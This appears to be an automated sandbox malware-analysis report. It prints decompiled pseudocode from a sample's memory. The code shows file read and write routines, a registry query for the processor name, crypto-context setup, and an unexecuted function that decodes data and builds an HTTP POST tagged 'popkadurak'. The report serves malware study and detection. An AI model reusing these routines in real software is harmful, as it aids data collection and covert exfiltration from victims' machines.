CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F143616
GetFileSize.KERNEL32(00000000,00000000), ref: 0F143626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F143639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F14364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F14368D
FindCloseChangeNotification.KERNEL32(00000000), ref: 0F143694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1436A2

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$ChangeCloseCreateFindModuleNameNotificationReadSize
String ID:
API String ID: 511603811-0
Opcode ID: 82a8c1a5d675a393c972a24e725b50c6be56eca9b650cd689346420a0b3cb219
Instruction ID: b44cf90f1dc54a91c886ea279b680b75f79e6427601ad6177da7e3a17bb44e6e
Opcode Fuzzy Hash: 82a8c1a5d675a393c972a24e725b50c6be56eca9b650cd689346420a0b3cb219
Instruction Fuzzy Hash: 32210B717C03047BF7255FA49C86FAE7B68EF84B21F200058FB05AA2C1C7B8B5549B54

Uniqueness

Uniqueness Score: -1.00%

Function 0F147D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F147D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0f147d71
0x0f147d7d
0x0f147d89
0x0f147d89
0x0f147d8f
0x0f147d9b
0x0f147d9b
0x0f147da1
0x0f147dad
0x0f147dad
0x0f147db3
0x0f147dbf
0x0f147dbf
0x0f147dc5
0x0f147dd1
0x0f147dd1
0x0f147dd7
0x0f147de3
0x0f147de3
0x0f147de9
0x0f147df5
0x0f147df5
0x0f147dfb
0x0f147e07
0x0f147e07
0x0f147e0d
0x0f147e19
0x0f147e19
0x0f147e22
0x00000000
0x0f147e31
0x0f147e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F1448AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F147E31

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8d313d8531f044a373805cd513ba72fd78230d885c9af78f22c47c9354b96bd2
Instruction ID: fc5059583083840acdb2271d1f8a8f47d5973acb692bbed11403a5298bd8ed88
Opcode Fuzzy Hash: 8d313d8531f044a373805cd513ba72fd78230d885c9af78f22c47c9354b96bd2
Instruction Fuzzy Hash: 2721C430290B04AAE7765A15DC06FA676E1BF80B45F65493CF2C1344F18BF57499EF44

Uniqueness

Uniqueness Score: -1.00%

Function 0F142890 Relevance: 12.1, APIs: 8, Instructions: 90
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F142890(WCHAR* __ecx, intOrPtr __edx) {
				long _v8;
				intOrPtr _v12;
				void* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t9;
				signed int _t14;
				void* _t18;
				void* _t19;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t24;
				WCHAR* _t29;
				void* _t34;
				signed int _t35;
				long _t37;
				void* _t38;
				void* _t40;

				_t29 = __ecx;
				_t28 = 0;
				_v12 = __edx;
				_t9 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t34 = _t9;
				if(_t34 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v8 = GetFileSize(_t34, 0);
					E0F143030(0, _t34, _t35); // executed
					asm("sbb esi, esi");
					_t37 = (_t35 & 0x00000003) + 1;
					_t14 = E0F143030(0, _t34, _t37);
					asm("sbb eax, eax");
					_t18 = CreateFileMappingW(_t34, 0, ( ~_t14 & 0xfffffffa) + 8, 0, 0, 0); // executed
					_v16 = _t18;
					if(_t18 != 0) {
						_t19 = MapViewOfFile(_t18, _t37, 0, 0, 0); // executed
						_t38 = _t19;
						if(_t38 != 0) {
							_t23 = E0F143030(0, _t34, _t38); // executed
							if(_t23 == 0) {
								_push(_t29);
								_t4 = _t38 + 0x53; // 0x53
								_t29 = _t4;
								_t5 = _t23 + 6; // 0x6, executed
								E0F148400(_t29, _t5); // executed
								_t40 = _t40 + 4;
							}
							_push(_t29);
							_t24 = E0F142830(_v12, _t38, _v8); // executed
							_t28 = _t24;
							UnmapViewOfFile(_t38);
						}
						CloseHandle(_v16);
						CloseHandle(_t34);
						return _t28;
					} else {
						CloseHandle(_t34);
						goto L3;
					}
				}
			}

0x0f142890
0x0f142899
0x0f14289b
0x0f1428ab
0x0f1428b1
0x0f1428b6
0x0f1428f9
0x0f142901
0x0f1428b8
0x0f1428c0
0x0f1428c3
0x0f1428ca
0x0f1428cf
0x0f1428d0
0x0f1428d8
0x0f1428e5
0x0f1428eb
0x0f1428f0
0x0f14290a
0x0f142910
0x0f142914
0x0f142916
0x0f14291d
0x0f14291f
0x0f142920
0x0f142920
0x0f142923
0x0f142926
0x0f14292b
0x0f14292b
0x0f14292e
0x0f142937
0x0f14293f
0x0f142942
0x0f142942
0x0f142951
0x0f142954
0x0f14295e
0x0f1428f2
0x0f1428f3
0x00000000
0x0f1428f3
0x0f1428f0

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,772D82B0,00000000,?,?,0F142C02), ref: 0F1428AB
GetFileSize.KERNEL32(00000000,00000000,?,?,0F142C02), ref: 0F1428BA
CreateFileMappingW.KERNELBASE(00000000,00000000,-00000008,00000000,00000000,00000000,?,?,0F142C02), ref: 0F1428E5
CloseHandle.KERNEL32(00000000,?,?,0F142C02), ref: 0F1428F3
MapViewOfFile.KERNEL32(00000000,772D82B1,00000000,00000000,00000000,?,?,0F142C02), ref: 0F14290A
UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,0F142C02), ref: 0F142942
CloseHandle.KERNEL32(?,?,?,0F142C02), ref: 0F142951
CloseHandle.KERNEL32(00000000,?,?,0F142C02), ref: 0F142954

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateView$MappingSizeUnmap
String ID:
API String ID: 265113797-0
Opcode ID: 306637e7265ea33964a972aee3a226e972427bb8a6fac59652ec95ddaa7384e1
Instruction ID: 49e6b2f91d9f010a47120a36375ab8f8a1186f2c37cae55239dc6a1cb3628b8c
Opcode Fuzzy Hash: 306637e7265ea33964a972aee3a226e972427bb8a6fac59652ec95ddaa7384e1
Instruction Fuzzy Hash: B521F2B5A412197BE3106B749C85F7F776CDF85A66F010224FC01E2281EB38BC254AA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F147410 Relevance: 7.5, APIs: 5, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F147410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}

0x0f147426
0x0f147430
0x0f147484
0x0f147432
0x0f147435
0x0f147447
0x0f14744f
0x0f147466
0x0f14746f
0x0f14747b
0x0f147451
0x0f147454
0x0f147457
0x0f147463
0x0f147463
0x0f14744f

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147426
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147447
RegCloseKey.KERNEL32(?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147457
GetLastError.KERNEL32(?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F147466
RegCloseKey.ADVAPI32(?,?,0F147885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F14746F

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: Close$ErrorLastOpenQueryValue
String ID:
API String ID: 2437438455-0
Opcode ID: 904de225a2f1fd1a144c35b1217af5497cf20a54f81261ddfe64133e11efba13
Instruction ID: a31428decdffae4466a8547bceb312c3212b30ecfdd79a0160cd91adae5e2fb5
Opcode Fuzzy Hash: 904de225a2f1fd1a144c35b1217af5497cf20a54f81261ddfe64133e11efba13
Instruction Fuzzy Hash: 1F012C7664111DFBCB109F94ED09DEABB68EF48362B018162FD09D6111D736AA34ABE0

Uniqueness

Uniqueness Score: -1.00%

Function 0F142830 Relevance: 4.5, APIs: 3, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F142830(WCHAR* __ecx, void* __edx, long _a4) {
				long _v8;
				void* _t3;
				int _t7;
				void* _t9;
				void* _t14;
				struct _OVERLAPPED* _t17;

				_push(__ecx);
				_t9 = __edx; // executed
				_t3 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0); // executed
				_t14 = _t3;
				_t17 = 0;
				if(_t14 != 0xffffffff) {
					if(_t9 == 0) {
						L3:
						_t17 = 1;
					} else {
						_t7 = WriteFile(_t14, _t9, _a4,  &_v8, 0); // executed
						if(_t7 != 0) {
							goto L3;
						}
					}
					FindCloseChangeNotification(_t14); // executed
				}
				return _t17;
			}

0x0f142833
0x0f14284a
0x0f14284c
0x0f142852
0x0f142854
0x0f142859
0x0f14285d
0x0f142873
0x0f142873
0x0f14285f
0x0f142869
0x0f142871
0x00000000
0x00000000
0x0f142871
0x0f142879
0x0f142879
0x0f142887

APIs

CreateFileW.KERNEL32(0F142C02,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000000,0F142C02,?,0F14293C,?), ref: 0F14284C
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,0F14293C,?,?,?,?,0F142C02), ref: 0F142869
FindCloseChangeNotification.KERNEL32(00000000,?,0F14293C,?,?,?,?,0F142C02), ref: 0F142879

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID:
API String ID: 3805958096-0
Opcode ID: 7110b213c83c9e92473ac15d97371af8bd1e6c41c04b533e3071ab2d90f671b2
Instruction ID: 9d734b5a5b8012306676e6f8f318fd15335b5dd2a62498276f41d952902e818e
Opcode Fuzzy Hash: 7110b213c83c9e92473ac15d97371af8bd1e6c41c04b533e3071ab2d90f671b2
Instruction Fuzzy Hash: 4BF0E27634020437E2200A96AC89FABB69CCBC6B61F510225BA08A20C1D6B4BC6146A4

Uniqueness

Uniqueness Score: -1.00%

Function 0F146550 Relevance: 2.5, APIs: 2, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0F146550(void** __ecx) {
				void** _v8;
				void* _t19;
				void* _t20;
				void* _t24;

				_push(__ecx);
				_v8 = __ecx;
				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
				_v8[1] = _t19;
				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
				 *_v8 = _t20;
				_v8[3] = 0x123;
				_v8[2] = 0x515;
				_t13 =  &(_v8[1]); // 0xc7000000
				_t24 = E0F1463E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
				if(_t24 == 0) {
					_v8[4] = 1;
				}
				_v8[4] = 0;
				return _v8;
			}

0x0f146553
0x0f146554
0x0f146565
0x0f14656e
0x0f14657f
0x0f146588
0x0f14658d
0x0f146597
0x0f1465b5
0x0f1465b9
0x0f1465c3
0x0f1465c8
0x0f1465c8
0x0f1465d2
0x0f1465df

APIs

VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F144B9E), ref: 0F146565
VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F144B9E), ref: 0F14657F

Part of subcall function 0F1463E0: CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F144B96,?,0F144B9E), ref: 0F1463F8
Part of subcall function 0F1463E0: GetLastError.KERNEL32(?,0F144B9E), ref: 0F146402
Part of subcall function 0F1463E0: CryptAcquireContextW.ADVAPI32(0F144B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F144B9E), ref: 0F14641E

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

API ID: AcquireAllocContextCryptVirtual$ErrorLast
String ID:
API String ID: 3824161113-0
Opcode ID: d1ebf50f168aaa0d6c14b178ee344ca3fb268851520407919d3643ed5b8f7830
Instruction ID: bf56d1e2374c7b93603e801f485ff5467e2ea222a459d34423d8c71a5c0fd8ec
Opcode Fuzzy Hash: d1ebf50f168aaa0d6c14b178ee344ca3fb268851520407919d3643ed5b8f7830
Instruction Fuzzy Hash: B111C974A40208EFD704CF84DA55F99B7F5EF88719F208188E908AB381D7B5AF109F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0F1453D0 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 230
stringmemoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0F1453D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
				int _v8;
				void* _v12;
				CHAR* _v16;
				void* _v20;
				void** _v24;
				void* _v28;
				void* _v32;
				char _v36;
				void* _v84;
				CHAR* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v104;
				short _v128;
				void* __esi;
				int _t40;
				BYTE* _t41;
				int _t43;
				void* _t61;
				void* _t65;
				void* _t68;
				void* _t69;
				intOrPtr _t71;
				CHAR* _t80;
				char* _t82;
				CHAR* _t83;
				void* _t84;
				CHAR* _t88;
				int _t96;
				void* _t98;
				void* _t99;
				int _t100;
				void* _t101;
				long _t102;
				BYTE* _t103;
				CHAR* _t105;
				void* _t106;
				void* _t108;

				_t82 = __ecx;
				_v16 = __edx;
				_t40 = lstrlenA(__ecx) + 1;
				_v8 = _t40;
				_t3 = _t40 + 1; // 0x2
				_t102 = _t3;
				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
				_v20 = _t41;
				if(_t41 == 0 || _v8 >= _t102) {
					_t103 = 0;
					__eflags = 0;
				} else {
					_t103 = _t41;
				}
				_t98 = 0;
				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
				_t116 = _t43;
				if(_t43 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t96 = _v8;
					E0F145F00(_t103, _t96, _t103);
					asm("xorps xmm0, xmm0");
					_t88 =  &_v36;
					asm("movdqu [ebp-0x20], xmm0");
					E0F1433E0(_t88, _t116, _t103);
					if(_v36 != 0) {
						E0F145350();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t82);
						_push(_t103);
						_t83 = _t88;
						_v96 = _t96;
						_push(0);
						_v88 = _t83;
						E0F147E40( &_v104);
						_v92 = E0F145220();
						_t99 = 0x400 + lstrlenA(_t83) * 2;
						_t22 = _t99 + 1; // 0x1
						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
						__eflags = _t84;
						if(_t84 == 0) {
							L20:
							_t105 = 0;
							__eflags = 0;
						} else {
							_t24 = _t99 + 1; // 0x1
							__eflags = _t99 - _t24;
							if(_t99 >= _t24) {
								goto L20;
							} else {
								_t105 = _t84;
							}
						}
						lstrcatA(_t105, _v16);
						asm("movdqu xmm0, [0xf14fb40]");
						asm("movdqu [ebp-0x78], xmm0");
						asm("movdqu xmm0, [0xf14fb50]");
						asm("movdqu [ebp-0x68], xmm0");
						asm("movdqu xmm0, [0xf14fb60]");
						asm("movdqu [ebp-0x58], xmm0");
						asm("movdqu xmm0, [0xf14fb70]");
						asm("movdqu [ebp-0x48], xmm0");
						asm("movdqu xmm0, [0xf14fb80]");
						asm("movdqu [ebp-0x38], xmm0");
						asm("movdqu xmm0, [0xf14fb90]");
						asm("movdqu [ebp-0x28], xmm0");
						lstrlenA(_t105);
						_t100 = 0;
						_push(lstrlenW( &_v128));
						_push( &_v128);
						_push(L"POST");
						_push(0x31fff);
						_push(_v12);
						_push(lstrlenA(_t105));
						_push(_t105);
						_t106 = _v20;
						_push(L"popkadurak");
						_push(_t106);
						_t61 = E0F148050( &_v32);
						__eflags = _t61;
						if(_t61 != 0) {
							__eflags = _a4;
							_t100 = 1;
							if(_a4 != 0) {
								_v16 = 0;
								_t68 = E0F1453D0(_v12,  &_v16);
								__eflags = _t68;
								if(_t68 == 0) {
									_t100 = 0;
									__eflags = 0;
								} else {
									_t69 = _v16;
									__eflags = _t69;
									if(_t69 != 0) {
										 *_v24 = _t69;
									}
								}
							}
						}
						VirtualFree(_t106, 0, 0x8000);
						VirtualFree(_v12, 0, 0x8000);
						VirtualFree(_t84, 0, 0x8000);
						_t65 = _v28;
						__eflags = _t65;
						if(_t65 != 0) {
							InternetCloseHandle(_t65);
						}
						return _t100;
					} else {
						_t101 = _v32;
						_t71 =  *0xf152a60; // 0x0
						_t108 = _v28;
						_t72 =  !=  ? 0 : _t71;
						_v12 = 1;
						 *0xf152a60 =  !=  ? 0 : _t71;
						if(_t108 != 0) {
							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
							 *_v16 = _t80;
							if(_t80 != 0) {
								lstrcpyA(_t80, _t108);
							}
						}
						_t73 = GetProcessHeap;
						if(_t101 != 0) {
							HeapFree(GetProcessHeap(), 0, _t101);
							_t73 = GetProcessHeap;
						}
						if(_t108 != 0) {
							HeapFree( *_t73(), 0, _t108);
						}
						_t98 = _v12;
						L14:
						VirtualFree(_v20, 0, 0x8000);
						return _t98;
					}
				}
			}

0x0f1453d9
0x0f1453db
0x0f1453e5
0x0f1453ed
0x0f1453f0
0x0f1453f0
0x0f1453f6
0x0f1453fc
0x0f145401
0x0f14540c
0x0f14540c
0x0f145408
0x0f145408
0x0f145408
0x0f14540e
0x0f14541b
0x0f145421
0x0f145423
0x0f1454dc
0x00000000
0x0f145429
0x0f145429
0x0f14542e
0x0f145433
0x0f145436
0x0f14543a
0x0f14543f
0x0f145447
0x0f1454e4
0x0f1454e9
0x0f1454ea
0x0f1454eb
0x0f1454ec
0x0f1454ed
0x0f1454ee
0x0f1454ef
0x0f1454f6
0x0f1454f7
0x0f1454f8
0x0f1454fa
0x0f1454fd
0x0f145501
0x0f145504
0x0f14550f
0x0f145525
0x0f14552c
0x0f145542
0x0f145546
0x0f145549
0x0f14554b
0x0f145558
0x0f145558
0x0f145558
0x0f14554d
0x0f14554d
0x0f145550
0x0f145552
0x00000000
0x0f145554
0x0f145554
0x0f145554
0x0f145552
0x0f14555e
0x0f145564
0x0f14556d
0x0f145572
0x0f14557a
0x0f14557f
0x0f145587
0x0f14558c
0x0f145594
0x0f145599
0x0f1455a1
0x0f1455a6
0x0f1455ae
0x0f1455b3
0x0f1455bc
0x0f1455c5
0x0f1455c9
0x0f1455ca
0x0f1455d2
0x0f1455d7
0x0f1455e1
0x0f1455e2
0x0f1455e3
0x0f1455e9
0x0f1455ee
0x0f1455ef
0x0f1455f4
0x0f1455f6
0x0f1455f8
0x0f1455fc
0x0f145601
0x0f145609
0x0f145610
0x0f145615
0x0f145617
0x0f145627
0x0f145627
0x0f145619
0x0f145619
0x0f14561c
0x0f14561e
0x0f145623
0x0f145623
0x0f14561e
0x0f145617
0x0f145601
0x0f145637
0x0f145643
0x0f14564d
0x0f14564f
0x0f145652
0x0f145654
0x0f145657
0x0f145657
0x0f145665
0x0f14544d
0x0f14544d
0x0f145452
0x0f145459
0x0f14545c
0x0f14545f
0x0f145466
0x0f14546d
0x0f145481
0x0f14548a
0x0f14548e
0x0f145492
0x0f145492
0x0f14548e
0x0f14549e
0x0f1454a5
0x0f1454ad
0x0f1454af
0x0f1454af
0x0f1454b6
0x0f1454be
0x0f1454be
0x0f1454c0
0x0f1454c3
0x0f1454cd
0x0f1454db
0x0f1454db
0x0f145447

APIs

lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1453DF
VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1453F6
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F14541B
lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145477
VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145481
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F145492
HeapFree.KERNEL32(00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1454AD
HeapFree.KERNEL32(00000000,?,?,?,?,0F145615,00000000,popkadurak), ref: 0F1454BE
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1454CD
GetLastError.KERNEL32(?,?,?,?,0F145615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F1454DC
lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F145512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F145532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F145544
lstrcatA.KERNEL32(00000000,?), ref: 0F14555E
lstrlenA.KERNEL32(00000000), ref: 0F1455B3
lstrlenW.KERNEL32(?), ref: 0F1455BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F1455DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F145637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F145643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F14564D
InternetCloseHandle.WININET(0F14581B), ref: 0F145657

Strings

popkadurak, xrefs: 0F1455E9
POST, xrefs: 0F1455CA

Memory Dump Source

Source File: 00000000.00000002.257980792.000000000F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F140000, based on PE: true

Associated: 00000000.00000002.257977286.000000000F140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257988090.000000000F14A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.257998223.000000000F154000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f140000_IJr8RvvhZ3.jbxd

Yara matches

Similarity

